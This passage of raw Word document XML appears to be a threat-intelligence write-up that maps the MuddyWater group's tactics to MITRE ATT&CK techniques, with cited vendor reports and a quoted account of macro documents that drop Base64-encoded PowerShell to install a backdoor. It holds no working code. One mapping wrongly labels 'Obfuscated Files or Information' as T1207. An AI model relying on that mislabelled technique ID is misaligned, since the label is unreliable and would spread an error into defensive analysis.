        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DDE398" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1132.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007137FB" w14:textId="7685B63C" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="00BC4827" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="127D5208" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC0B913" w14:textId="6A4A584B" w:rsidR="0069470D" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3888EDC6" w14:textId="49FFBADD" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78169B52" w14:textId="77BF61AC" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>C2 Exfiltration example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069470D" w:rsidRPr="00B857D7" w14:paraId="235D6A5B" w14:textId="77777777" w:rsidTr="002B57F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50229F94" w14:textId="3CAE43D4" w:rsidR="0069470D" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B50D41F" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E67D8E" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136B97B1" w14:textId="437FFB8C" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4827">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21A71262" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2178EC1B" w14:textId="412A2E68" w:rsidR="0069470D" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37068B9F" w14:textId="20781330" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C/A</w:t>
            </w:r>
            <w:r w:rsidR="00B42656">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11271500" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049125D" w:rsidRPr="00B857D7" w14:paraId="3005D3C7" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="374963B9" w14:textId="77777777" w:rsidR="0049125D" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="158389AD" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="724560AD" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9ABAD7" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CFEBCD2" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="639EA1A6" w14:textId="77777777" w:rsidR="0049125D" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AC4395" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A982A6" w14:textId="77777777" w:rsidR="0049125D" w:rsidRPr="00B857D7" w:rsidRDefault="0049125D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42729519" w14:textId="67B90F47" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1"/>
    <w:p w14:paraId="40CEB4E7" w14:textId="4FD7391E" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidR="00350C49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Muddying the Water: Targeted Attacks in the Middle East (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00350C49">
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB705E0" w14:textId="1ECAA0F6" w:rsidR="00350C49" w:rsidRDefault="00350C49" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId149" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8DAD65" w14:textId="1441663F" w:rsidR="00350C49" w:rsidRDefault="00350C49" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MuddyWater</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> expands operations | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC494B" w14:textId="745C995F" w:rsidR="00350C49" w:rsidRDefault="00350C49" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies (anomali.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74BCBD" w14:textId="3CCC8036" w:rsidR="00350C49" w:rsidRDefault="00350C49" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Earth </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vetala</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MuddyWater</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Continues to Target Organizations in the Middle East (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F6565" w14:textId="42C19BFF" w:rsidR="00EB2104" w:rsidRDefault="00EB2104" w:rsidP="00292FA1"/>
    <w:p w14:paraId="4AA688F5" w14:textId="77777777" w:rsidR="00EB2104" w:rsidRDefault="00EB2104" w:rsidP="00292FA1">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A6A58" w14:textId="54A4E35B" w:rsidR="00EB2104" w:rsidRDefault="00EB2104" w:rsidP="00292FA1">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1E3AB" w14:textId="3CD6A897" w:rsidR="00EB2104" w:rsidRDefault="00EB2104" w:rsidP="00292FA1">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E80E6" w14:textId="54B30B33" w:rsidR="00EB2104" w:rsidRDefault="00EB2104" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AEDDEA2" w14:textId="76CC222C" w:rsidR="00C60DCA" w:rsidRDefault="00C60DCA" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[1] Use July approach (Saudi Arabia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047F1D1" w14:textId="377BF992" w:rsidR="008C6A37" w:rsidRDefault="008C6A37" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="008C6A37">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04793083" w14:textId="070901AC" w:rsidR="009D76B8" w:rsidRDefault="009D76B8" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">We attribute this activity to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>TEMP.Zagros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reported by Palo Alto Networks and Trend Micro as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>MuddyWater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of </w:t>
      </w:r>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">government and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006451C7" w:rsidRPr="006451C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91D78E" w14:textId="3E68129B" w:rsidR="00765632" w:rsidRDefault="00765632" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command</w:t>
      </w:r>
      <w:r w:rsidR="0049125D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0049125D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0049125D" w:rsidRPr="0049125D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0049125D" w:rsidRPr="0049125D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1207 Obfuscated Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="0049125D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which will be decoded and executed by PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00FF3672" w:rsidRPr="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1059.001 : &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00FF3672" w:rsidRPr="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>using the command line generated by the VBS file on execution using WScript.exe</w:t>
      </w:r>
      <w:r w:rsidR="00FF3672">
